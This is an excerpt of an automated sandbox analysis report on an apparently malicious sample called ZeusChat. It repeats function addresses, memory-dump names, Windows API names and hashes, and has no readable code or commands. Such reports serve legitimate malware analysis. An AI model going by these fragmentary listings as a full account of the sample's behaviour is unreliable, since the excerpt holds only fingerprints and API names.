                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 3220332590-0
                                                                                                      • Opcode ID: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
                                                                                                      • Instruction ID: d17367d05d2447e8da687726d0284c0ee5199ba91936be140e341d356066ca52
                                                                                                      • Opcode Fuzzy Hash: 18d3220a09dc32d3d71dcb14d157741ee50ede115eaee0b264565a3d31b006b7
                                                                                                      • Instruction Fuzzy Hash: F1A1166AA1A24385F724AF7588447BDB3A0FF04B18F981035DE1E47E94EB7C9809D334
                                                                                                      Function 00007FF752005C44 Relevance: 9.2, APIs: 6, Instructions: 239COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 1568231622-0
                                                                                                      • Opcode ID: 79e0420c2984852e5f59fe1e813506d9fafb4aaa62b9c0ac84c7f4c88eda00f4
                                                                                                      • Instruction ID: e474062a763f8bc2a02511d6703abe9e0a7d0309976d8abb0073672f7b049c41
                                                                                                      • Opcode Fuzzy Hash: 79e0420c2984852e5f59fe1e813506d9fafb4aaa62b9c0ac84c7f4c88eda00f4
                                                                                                      • Instruction Fuzzy Hash: C2C161A5E8E6C2C6F661EB10AC80276BB51AF11784FCC4035D88D426A9DEECB54EC771
                                                                                                      Function 00007FF75206B314 Relevance: 9.2, APIs: 6, Instructions: 193COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • #8.OLEAUT32(?,?,?,?,?,?,?,00007FF75206B677,?,?,?,?,?,?,00000000,00007FF7520983FD), ref: 00007FF75206B329
                                                                                                      • #9.WSOCK32(?,?,?,?,?,?,?,00007FF75206B677,?,?,?,?,?,?,00000000,00007FF7520983FD), ref: 00007FF75206B3AE
                                                                                                      • #10.WSOCK32(?,?,?,?,?,?,?,00007FF75206B677,?,?,?,?,?,?,00000000,00007FF7520983FD), ref: 00007FF75206B3BA
                                                                                                      • #9.WSOCK32(?,?,?,?,?,?,?,00007FF75206B677,?,?,?,?,?,?,00000000,00007FF7520983FD), ref: 00007FF75206B3C5
                                                                                                      • #2.WSOCK32(?,?,?,?,?,?,?,00007FF75206B677,?,?,?,?,?,?,00000000,00007FF7520983FD), ref: 00007FF75206B3F5
                                                                                                      • #10.WSOCK32(?,?,?,?,?,?,?,00007FF75206B677,?,?,?,?,?,?,00000000,00007FF7520983FD), ref: 00007FF75206B457
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 785b3640f85267f1ef9f05d197945c1451001bbbcd8b86362fb934929ab386fd
                                                                                                      • Instruction ID: e4e7711234b01739a65ed808bdea0f780e5be353685c24d8053dc02a197ad51e
                                                                                                      • Opcode Fuzzy Hash: 785b3640f85267f1ef9f05d197945c1451001bbbcd8b86362fb934929ab386fd
                                                                                                      • Instruction Fuzzy Hash: 54716371B0A38282EA24BF2599941BCE7A1EF45780F8C4136D74D17B91DFADF918C328
                                                                                                      Function 00007FF752010350 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 119COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                      • API String ID: 0-2263619337
                                                                                                      • Opcode ID: 10a07b77c3d4b654f9d55339737c030c9922b14c4774005ba61325eac3fbb13f
                                                                                                      • Instruction ID: caa775ebb9da4d965c255803aa3a1b509898dbdb0be117f9fb3c0e73395e80f7
                                                                                                      • Opcode Fuzzy Hash: 10a07b77c3d4b654f9d55339737c030c9922b14c4774005ba61325eac3fbb13f
                                                                                                      • Instruction Fuzzy Hash: 7F51C432F0BA1685EF10EB64D8841BDB365EB84B84F988132DA4D47795DE79D40AC3A0
                                                                                                      Function 00007FF752001B30 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                      • String ID:
                                                                                                      • API String ID: 2592858361-0
                                                                                                      • Opcode ID: c0ed2a69acb1fa65bc09f52d169f3783c288c6979980f6a8e8ea6be4c03c785a
                                                                                                      • Instruction ID: 8d26c780d101518a3d4e7db83a43a7769f2435bd87add6494c95a30c10208227
                                                                                                      • Opcode Fuzzy Hash: c0ed2a69acb1fa65bc09f52d169f3783c288c6979980f6a8e8ea6be4c03c785a
                                                                                                      • Instruction Fuzzy Hash: 2E51D132A1A78286EB20EB15D884779B7A1FB45B94F884235CA5C07B94DFBDE509C710
                                                                                                      Function 00007FF75206BD00 Relevance: 9.1, APIs: 6, Instructions: 56stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: From$Prog$ExceptionFreeRaiseStringTasklstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 450394209-0
                                                                                                      • Opcode ID: c3e3764820b3f5600a73afc0a99e1e7d3feceb6c0e9b2fc54303b0e2514af5be
                                                                                                      • Instruction ID: 4fc5a94cdaca82756273a7de3c7775f81d04a6e2feb967a0b4332f531320540b
                                                                                                      • Opcode Fuzzy Hash: c3e3764820b3f5600a73afc0a99e1e7d3feceb6c0e9b2fc54303b0e2514af5be
                                                                                                      • Instruction Fuzzy Hash: CA117272B1968287E764AB16EC4032AA3A1AB85BC4F9C4031DB4D4BB58DF7DE848C710
                                                                                                      Function 00007FF752031D04 Relevance: 9.1, APIs: 6, Instructions: 56threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2082702847-0
                                                                                                      • Opcode ID: 14857e1ad4c4825aa7d047bb9807a31f284bfb654c1297a130cb15933308218e
                                                                                                      • Instruction ID: 0e0ed5787f968ad0db935098783d2d311dc405f5bb420042b950771aff2a2ebd
                                                                                                      • Opcode Fuzzy Hash: 14857e1ad4c4825aa7d047bb9807a31f284bfb654c1297a130cb15933308218e
                                                                                                      • Instruction Fuzzy Hash: 96218425A0FB0A81EE65BB60AE04279E290AF69774F8C0734D93D067D4DFBCD40CC220
                                                                                                      Function 00007FF752072828 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsDevice$Release
                                                                                                      • String ID:
                                                                                                      • API String ID: 1035833867-0
                                                                                                      • Opcode ID: e96038359b8bcf9d40ab16245d6c00f02c1c42b7617fe174b97500c319439ec5
                                                                                                      • Instruction ID: 11bfe114999343c987690acb926a83b8f0ba062f3795e663f7c3230b5e680dfc
                                                                                                      • Opcode Fuzzy Hash: e96038359b8bcf9d40ab16245d6c00f02c1c42b7617fe174b97500c319439ec5
                                                                                                      • Instruction Fuzzy Hash: CD11A335706B4186EB58EF61985412DABA1FB48FC0F888478CE0E47B94CE7DD849C710
                                                                                                      Function 00007FF7520B117C Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                      • String ID:
                                                                                                      • API String ID: 43455801-0
                                                                                                      • Opcode ID: aa036b7f6b4181bf747b7f25e8c59d16cc241acf913ae98ed06744a76854e657
                                                                                                      • Instruction ID: 4edf4925395aa78656ea3eb209dfe7447cdc2e67ee9ee50b372b930528200913
                                                                                                      • Opcode Fuzzy Hash: aa036b7f6b4181bf747b7f25e8c59d16cc241acf913ae98ed06744a76854e657
                                                                                                      • Instruction Fuzzy Hash: 9C11BF31B5529282E724AB15BC04B6DAB60EB85B84F8C4530CF1A03B54CFBEE859CB40
                                                                                                      Function 00007FF752004050 Relevance: 9.0, APIs: 6, Instructions: 39keyboardCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4278518827-0
                                                                                                      • Opcode ID: 7b1f2997da372a43bc31476f6d0c07695968ad033343f6aabdfa55d6cba17457
                                                                                                      • Instruction ID: af5df0f92bf66be52bba348d4072b57e77fb9f26c950fbcf9d329332831b5914
                                                                                                      • Opcode Fuzzy Hash: 7b1f2997da372a43bc31476f6d0c07695968ad033343f6aabdfa55d6cba17457
                                                                                                      • Instruction Fuzzy Hash: 9211C232916640CAD359DF39CC8821D7BB2FB58B08F888574C20D87261DF38C49EC715
                                                                                                      Function 00007FF7520398C8 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: #$E$O
                                                                                                      • API String ID: 3215553584-248080428
                                                                                                      • Opcode ID: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                                                                                                      • Instruction ID: 305fbb7db4e59feadef4977b90a07aed6d6fcc40e08c86e94126b4726c79482d
                                                                                                      • Opcode Fuzzy Hash: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                                                                                                      • Instruction Fuzzy Hash: E9419426A1EB5986EF51AF259E801ADA3B0BF64788F8C4131EE4D07759DF7CD449C320
                                                                                                      Function 00007FF752005648 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                                      • String ID: Line %d: $AutoIt -
                                                                                                      • API String ID: 3135491444-4094128768
                                                                                                      • Opcode ID: 354254922fa2c28dd54db28c89f49ff099e9fde37b9e557e9e980069f242a2a6
                                                                                                      • Instruction ID: b0c046023c103ed91bbfbe1cee330a8f129620314dbc5845850ba12e81e26a08
                                                                                                      • Opcode Fuzzy Hash: 354254922fa2c28dd54db28c89f49ff099e9fde37b9e557e9e980069f242a2a6
                                                                                                      • Instruction Fuzzy Hash: 39413762A0E64696F710FB20EC811BAA762FB95344FC84131E58D4759ADFBCE50DC760
                                                                                                      Function 00007FF7520A9C5C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowlibraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                      • String ID: SysAnimate32
                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                      • Opcode ID: 0f65093a7382f8a48a4cc55905c2204c55616e0901a85524ccd8895086e96556
                                                                                                      • Instruction ID: 41f934e916b54c7b991c4434491e4e78ff3c585a4c5833e3a4e3caf82274a1e2
                                                                                                      • Opcode Fuzzy Hash: 0f65093a7382f8a48a4cc55905c2204c55616e0901a85524ccd8895086e96556
                                                                                                      • Instruction Fuzzy Hash: 3C31823270A781CAEBA0AF24E84076E77A1FB85790F984135DA5D07B94DF7CD885CB10
                                                                                                      Function 00007FF752028FF4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: bf97d253b0b0f27bc9f8dee52e5b911b6d739ecbcd2cb4f6be9dea0dab631d0a
                                                                                                      • Instruction ID: 8ba41b042257834758d83d0293e83c374a58fff12d732ea26b3d488a6a96c8e7
                                                                                                      • Opcode Fuzzy Hash: bf97d253b0b0f27bc9f8dee52e5b911b6d739ecbcd2cb4f6be9dea0dab631d0a
                                                                                                      • Instruction Fuzzy Hash: 00F04421A1AA4A81EF55AB11F8C037DA7A0EF88B90FDC1035E94F46754DEBDD84CC710
                                                                                                      Function 00007FF752048844 Relevance: 7.8, APIs: 5, Instructions: 265COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6a55710d5b20bbebf70dcaf2af2ba2f9473b57b39f5035fa7bc312dbbbf193c7
                                                                                                      • Instruction ID: 5c52e777c99b47f0d045cd6b0f7e962a7a2fc01cb6c6a4170cca3231f9ef8519
                                                                                                      • Opcode Fuzzy Hash: 6a55710d5b20bbebf70dcaf2af2ba2f9473b57b39f5035fa7bc312dbbbf193c7
                                                                                                      • Instruction Fuzzy Hash: D2A1E862F0A78249FB716B519C14379E6A1AF407A4F8C8A35DA6D077C5DFBCE448C3A0
                                                                                                      Function 00007FF75203EB98 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
